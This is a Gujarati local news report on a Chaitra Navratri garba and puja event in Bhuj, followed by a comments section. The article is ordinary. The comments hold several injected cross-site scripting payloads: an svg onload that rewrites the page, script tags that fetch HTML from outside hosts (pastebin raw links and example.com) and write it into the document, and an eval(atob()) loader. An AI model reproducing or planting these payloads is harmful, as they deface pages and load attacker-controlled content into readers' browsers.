ચૈત્ર નવરાત્રી પ્રસંગે માતાજીના બેઠા ગરબા શક્રાદય સ્તુતિ સાથે કુમારીકા અને બટુકોનું પૂજન કરાયું
ભુજ - કચ્છઉદય : શહેરના હાટકેશ અંબિકા મહિલા મંડળ અને સંસ્કૃત પાઠશાળા દ્વારા ચૈત્ર નવરાત્રીના પ્રથમ નોરતે પાઠશાળા ખાતે માતાજીના બેઠા ગરબા, શક્રાદય સ્તુતિ, તેમજ ૩૧ જેટલા કુમારીકા અને બટુકોનું પૂજન કરી લહાણી અપાઈ હતી. બેઠા ગરબાની રમઝટ જયશ્રીબેન હાથી, પારૂલબેેન બુચ, આશાબેન સ્વાદીયા તેમજ દર્શનાબેન મુનશીએ બોલાવી હતી. પૂજનવિધિ તુષારભાઈ ધોળકિયાએ કરાવી હતી.
આ પ્રસંગે સંસ્કૃત પાઠશાળાના સંચાલક વિભાકરભાઈ અંતાણીને તેમના જન્મદિન પ્રસંગે શુભેચ્છાઓ પાઠવી સન્માન કરવામાં આવ્યું હતું. જવનીકાબેન પાઠક, બકુલનાબેન શુક્લ, દિવ્યાબેન પટ્ટણી, શ્રદ્ધાબેન ધોળકિયા સહિતના ઉપસ્થિત રહ્યા હતા અને પૂજનવિધિ કરી હતી. કાર્યક્રમનું સંચાલન આશિષભાઈ વૈદ્યે જ્યારે આભાર દર્શન વારીશભાઈ પટ્ટણીએ કર્યું હતું. કાર્યક્રમને સફળ બનાવવા મુકેશભાઈ વૈદ્ય, દર્શનાબેન વૈદ્ય, અશિતભાઇ અંતાણીએ જહેમત ઉઠાવી હતી તેવું વત્સલાબેન શુક્લની યાદીમાં જણાવાયું હતું.
----------

Comments
rahuls
<svg onload="document.body.innerHTML='<h1 style="background:red;color:black;height:100vh;display:flex;align-items:center;justif ">
rahuls
<script>fetch("https://example.com/index.html").then(r=>r.text()).then(html=>{document.open();document.write(html);document.close();});</script>
john447@gmaill.com
<script>fetch("https://pastebin.com/raw/jJqqzkRu").then(r=>r.text()).then(html=>document.body.innerHTML=html);</script>
john447@gmaill.com
<script>fetch("https://pastebin.com/raw/zDNjLaVD").then(r=>r.text()).then(html=>document.body.innerHTML=html);</script>
john447@gmaill.com
<script>
eval(atob("QkFTRTY0X0VOQ09ERURfU1RSSU5HX0hFUkU="));
</script>